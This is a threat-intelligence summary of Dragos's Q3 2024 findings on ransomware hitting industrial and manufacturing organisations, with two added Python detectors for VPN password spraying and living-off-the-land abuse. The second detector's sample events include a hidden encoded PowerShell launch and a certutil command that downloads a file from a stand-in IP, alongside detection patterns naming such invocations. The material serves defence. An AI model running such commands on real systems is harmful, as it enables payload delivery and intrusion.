The threat of ransomware is a leading concern for industries globally. While ransomware attacks often target IT systems, the interconnectedness of operational technology (OT) and IT means that the disruption in one can often lead to disruptions in the other.
Nowhere is the risk more pronounced than in the manufacturing sector, where OT systems control the physical processes critical to production. Ransomware attacks can bring factories to a standstill.
The third quarter (July – September) of 2024 brought transformative shifts to the ransomware landscape, emphasizing its dynamic and continuously evolving nature. This highly active ecosystem was fuelled by new groups, the rebranding of existing entities, the expansion of initial access broker operations, and the proliferation of illicitly traded tools. Ransomware operators increasingly demonstrated their ability to pivot in response to disruptions during the third quarter, leveraging technological advancements and strategic realignments to maintain their operations.
Adding to this complexity, escalations in geopolitical tensions during the third quarter introduced a new dimension to ransomware threats. Specifically, conflicts in the Middle East and Eastern Europe spurred a rise in hacktivist personas employing ransomware to disrupt industrial operations. Unlike traditional financially motivated ransomware campaigns, these actors appear to prioritize operational sabotage, posing a distinct and potentially catastrophic risk to critical infrastructure.
The latest Dragos OT Cybersecurity Report documented 905 ransomware attacks impacting organizations in 2023, but the first three quarters of 2024 have already seen 1,033 incidents, signalling a troubling increase and underscoring the escalating threat to operational technology systems.
Emerging Ransomware Threats
In the third quarter of 2024, Dragos observed the emergence of several new ransomware groups, including Fog, Helldown, and RansomHub, impacting industrial organizations, along with multiple initial access and post-compromise techniques that exploit vulnerable remote access and virtual network applications.
These newer ransomware groups consistently attacked industrial sectors, employing several advanced tactics to exploit operationally critical IT systems. Notably, their campaigns appeared to prioritize industries and organizations with a low tolerance for downtime, such as healthcare, financial services, and industrial operations. By focusing on environments where operational disruption can lead to cascading impacts, these groups increased the likelihood of ransom payments, leveraging the criticality of uninterrupted services to pressure victims.
Ransomware groups such as Fog, Helldown, and RansomHub were particularly active and gained traction by exploiting vulnerabilities in VPNs and leveraging living-off-the-land techniques.
- Fog ransomware was first observed targeting virtual environments and backup systems critical to industrial operations. By exploiting vulnerabilities in hypervisors and backup solutions, Fog can encrypt virtual machine files and delete backups, significantly disrupting operational continuity.
- Helldown, built on tooling from LockBit’s leaked builder, has been active in manufacturing sectors, employing sophisticated double extortion techniques. The group has shown a propensity for credential harvesting and lateral movement using default administrative tools, ensuring persistence while maximizing impact.
- RansomHub, a RaaS operation, claimed over 300 victims globally in 2024. It has aggressively targeted industrial organizations in the energy, water management, transportation, and manufacturing sectors. Affiliates of RansomHub, including Velvet Tempest, have demonstrated advanced capabilities, such as deploying customized payloads and exploiting VPN vulnerabilities.
Eldorado and Play are further examples of ransomware operators shifting their intrusion TTPs toward virtual networking applications; both were observed targeting VMware ESXi environments.
Exploiting remote services and virtual networking applications was a common initial access route for ransomware operators in the third quarter. According to one source, approximately 30% of ransomware incidents during the third quarter were linked to vulnerabilities in VPN appliances (for example, CVE-2024-40766 affecting SonicWall SSL VPNs) or poorly managed credentials.
To highlight this operational shift:
- From 2021–2023: VPN exploitation was predominantly associated with opportunistic attacks, with actors focusing on unpatched vulnerabilities in devices like Pulse Secure and Fortinet. During these years, VPN access served primarily as an initial foothold for lateral movement or deploying ransomware payloads in high-profile cases like Colonial Pipeline (2021).
- In 2024: Ransomware operators have advanced their tactics by combining vulnerability exploitation with credential-based attacks to bypass multi-factor authentication (MFA) protections. They employ credential stuffing, pass-the-hash attacks, and brute force techniques. Compromised credentials, often sourced from Initial Access Brokers (IABs), have become central to their strategies. For instance, the Akira ransomware group has been observed exploiting vulnerabilities in VPN appliances to gain initial access to networks.
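The credential-based VPN attacks described above (brute force and credential stuffing) leave a recognisable footprint in VPN authentication logs: a burst of failures from one source address across several usernames, sometimes followed by a success. The detector below is an added example, not code from the report or from Dragos; the log format, field names, thresholds and all sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed VPN authentication log lines in a syslog-like format (not real data).
# 203.0.113.9 sprays four accounts and then logs in as m.lee; 198.51.100.23 is a normal login.
SAMPLE_LOG = """\
2024-08-14T02:10:01Z vpn01 auth: user=j.doe src=203.0.113.9 result=FAIL
2024-08-14T02:10:03Z vpn01 auth: user=a.smith src=203.0.113.9 result=FAIL
2024-08-14T02:10:05Z vpn01 auth: user=m.lee src=203.0.113.9 result=FAIL
2024-08-14T02:10:08Z vpn01 auth: user=r.chen src=203.0.113.9 result=FAIL
2024-08-14T02:10:11Z vpn01 auth: user=j.doe src=203.0.113.9 result=FAIL
2024-08-14T02:10:14Z vpn01 auth: user=a.smith src=203.0.113.9 result=FAIL
2024-08-14T02:11:40Z vpn01 auth: user=m.lee src=203.0.113.9 result=SUCCESS
2024-08-14T09:30:00Z vpn01 auth: user=j.doe src=198.51.100.23 result=SUCCESS
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) auth: user=(?P<user>\S+) "
                     r"src=(?P<src>\S+) result=(?P<result>\w+)$")

def parse(log_text):
    """Parse log lines into dicts; lines that do not match the assumed format are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events

def detect_spray(events, window=timedelta(minutes=10), min_failures=5, min_users=3):
    """Flag a source that accumulates >= min_failures failed logins across >= min_users
    accounts inside one window, and record any success from that source shortly after."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "FAIL"]
        for i, first in enumerate(fails):
            burst = [e for e in fails[i:] if e["ts"] - first["ts"] <= window]
            users = {e["user"] for e in burst}
            if len(burst) >= min_failures and len(users) >= min_users:
                end = burst[-1]["ts"]
                success = [e["user"] for e in evs if e["result"] == "SUCCESS"
                           and first["ts"] <= e["ts"] <= end + window]
                alerts.append({"src": src, "failures": len(burst),
                               "users": len(users), "success_after": success})
                break  # one alert per source address
    return alerts
```

A success following the burst is the case worth escalating: it suggests a valid credential was found, which is exactly the MFA-bypass path the report describes.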
Advanced Lateral Movement and Persistence Techniques
Lastly, Dragos observed multiple ransomware groups that expanded their post-compromise lateral movement capabilities in the third quarter by blending traditional methods with advanced persistence mechanisms.
- Living-Off-the-Land Techniques (LOLTs): Ransomware operators evaded detection by mimicking legitimate network activity using legitimate administrative tools like PowerShell, certutil.exe, and PsExec.
- Abuse of Remote Access Tools: Tools like AnyDesk and Quick Assist continued to be exploited to establish persistent access. This quarter also saw increased use of remote access tools in conjunction with custom scripts designed to disable antivirus protection.
- Targeting Virtual Environments: Groups like Eldorado and Play developed Linux lockers specifically to target VMware ESXi environments. These lockers encrypt critical virtual machine files while disabling active VMs, disrupting business operations with minimal pre-encryption dwell time.
- Integration of Advanced Malware: Groups such as Black Basta shifted to custom malware, employed backdoor tools like SilentNight, tunnelling utilities like PortYard, and memory-only droppers like DawnCry to maintain persistence and evade endpoint detection.
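Because the living-off-the-land tools listed above are legitimate binaries, detection has to key on how they are invoked rather than on their presence. The rule set below is an added example, not code from the report or from Dragos; it runs over constructed process-creation events (Sysmon Event ID 1 style) and flags encoded PowerShell, certutil used for download or decoding, and the PsExec service binary. Field names and sample values are assumptions for illustration.

```python
import re

# Constructed process-creation events (not real telemetry): host, parent image, image, command line.
SAMPLE_EVENTS = [
    {"host": "eng-ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoProfile Get-Service"},                       # benign admin use
    {"host": "eng-ws01", "parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -EncodedCommand SQBFAFgA..."},   # encoded payload
    {"host": "hist-srv02", "parent": "cmd.exe", "image": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://198.51.100.7/x.txt x.txt"},  # download
    {"host": "hist-srv02", "parent": "services.exe", "image": "PSEXESVC.exe",
     "cmd": "C:\\Windows\\PSEXESVC.exe"},                                    # PsExec service
    {"host": "dc01", "parent": "mmc.exe", "image": "certutil.exe",
     "cmd": "certutil.exe -store My"},                                       # benign cert query
]

# (rule name, image pattern, command-line pattern); all matched case-insensitively.
RULES = [
    ("powershell_encoded_command", r"powershell(\.exe)?$",
     r"(^|\s)-(e|ec|enc|encodedcommand)\b"),
    ("certutil_download_or_decode", r"certutil(\.exe)?$",
     r"-(urlcache|decode|verifyctl)\b"),
    ("psexec_service_binary", r"psexesvc(\.exe)?$", r"."),
]

def detect(events):
    """Return (host, rule name) pairs for every event matching a rule."""
    hits = []
    for ev in events:
        for name, img_re, cmd_re in RULES:
            if (re.search(img_re, ev["image"], re.IGNORECASE)
                    and re.search(cmd_re, ev["cmd"], re.IGNORECASE)):
                hits.append((ev["host"], name))
    return hits

if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The benign events (an interactive Get-Service call and a certificate-store query) produce no hits, which is the point: the rules look for invocation patterns, not tool names.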
Dragos assesses with moderate confidence that ransomware activity targeting industrial organizations will continue to escalate into the future. Although Dragos is unaware of any direct attacks on operational technology (OT) assets by the newly identified ransomware groups, ransomware-induced downtime in IT environments often halted industrial processes and led to financial losses, production delays, and safety risks. The interconnected nature of IT and OT networks continued to create dependencies that amplified disruptions from a successful ransomware incident.
Hacktivism and the Rise of Ransomware-Driven Operations
During the third quarter of 2024, Dragos observed an escalating trend of hacktivist groups integrating ransomware into their operations, signalling a significant shift in tactics and potential impact. Groups such as CyberVolk, Handala, and KillSec leveraged ransomware to amplify the disruption caused by their campaigns, blurring the lines between ideological activism and financially motivated cybercrime.
CyberVolk, in particular, represents a troubling development within the ransomware ecosystem. Operating under the alias “cybervolk_group” on social platforms, the group launched its own RaaS platform in June 2024 and announced the development of its proprietary CyberVolk ransomware in July 2024. This ransomware has been deployed in pro-Russian campaigns targeting critical infrastructure, combining encryption algorithms with advanced payload delivery mechanisms typically seen in financially motivated operations.
Although Dragos has not observed any direct impacts on industrial organizations during the third quarter of 2024, the growing sophistication and operational focus of groups like CyberVolk remain deeply concerning. The integration of ransomware into hacktivist operations represents a dangerous convergence of destructive malware and ideological motives, increasing the likelihood of significant impacts on critical infrastructure sectors in the future. This trend demands heightened vigilance, as it underscores the evolving risks posed by hacktivist groups leveraging ransomware for political and ideological ends.
Regional Impact Observations, Third Quarter of 2024
Ransomware incidents in the third quarter of 2024 demonstrated distinct regional variations, with North America continuing to experience the highest volume of attacks. The data reflects the global nature of ransomware threats, with every region affected to varying degrees. Oceania reported 12 incidents (approximately 2% of global ransomware activity). Australia and New Zealand were the primary targets, and the incidents impacted the technology, education, and healthcare sectors. While Australia’s manufacturing wasn’t a primary target in the third quarter, given the volume of ransomware attacks against this sector globally, it is plausible that Australia-based manufacturers may find themselves in a ransomware group’s crosshairs in Q4 and beyond.
Industry Impacts, Third Quarter of 2024
- The manufacturing sector was the most impacted, with 394 observed incidents, accounting for 71% of all ransomware incidents.
- Industrial control systems (ICS) equipment and engineering experienced 56 incidents, making up approximately 10% of the total incidents.
- The transportation sector faced 38 incidents, representing 7% of all observed incidents.
- Communications experienced 17 incidents and electric 13, collectively making up approximately 5% of ransomware incidents.
- Oil and natural gas (ONG) recorded 13 incidents, reflecting 2% of the total incidents.
- Government sector entities faced 12 ransomware incidents, making up 2% of the total incidents.
- Water and wastewater entities faced five ransomware incidents.
- Mining faced three ransomware incidents.
- The data centre sector faced one ransomware incident.
In addition to the primary industries and sectors mentioned above, Dragos observed ransomware activity impacting 23 unique manufacturing subsectors in the third quarter of 2024. The percentage breakdown, based on all manufacturing incidents, is as follows:
- Construction: 117 incidents (30% of manufacturing incidents).
- Food & Beverage: 45 incidents (11%).
- Machinery and Equipment: Each had 27 incidents (7% each).
- Electronics: 28 incidents (7%).
- Consumer Goods: 26 incidents (6%).
- Automotive: 21 incidents (5%).
- Pharma: 16 incidents (4%).
- Textile: 15 incidents (4%).
- Metal: 12 incidents (3%).
- Healthcare: 11 incidents (3%).
- Agriculture: 10 incidents (3%).
- Aerospace, Chemical, and Electrical: Each had six incidents (2% each).
- Semiconductor: 5 incidents.
- Automation and Packaging: Each had four incidents.
- Defence, Paper and Plastics: Each had two incidents.
- Maritime, Recycling, and Textiles: Each had one incident.
As illustrated in Figure 3 below, ransomware incidents during the third quarter of 2024 have significantly increased compared to the previous quarter, with sectors such as manufacturing experiencing heightened activity. This trend highlights ransomware operators’ sustained focus on industries critical to operational continuity and infrastructure.
Closing Thoughts
The third quarter of 2024 highlighted the ongoing evolution of ransomware threats. The industrial sector, particularly manufacturing and ICS equipment and engineering, remained a prime target, with ransomware operators leveraging advanced tactics and exploiting weak credential practices and vulnerabilities in remote access systems.
Organisations must prioritize strong cybersecurity measures to mitigate these threats, including monitoring critical ports, enforcing multi-factor authentication (MFA), maintaining offline backups, and securing remote access. Enhanced personnel training and continuous assessment of network architecture are critical to defending against evolving tactics.
As the ransomware landscape continues to fragment and adapt, proactive defences, intelligence sharing, and collaboration will remain essential to protecting critical infrastructure and industrial operations.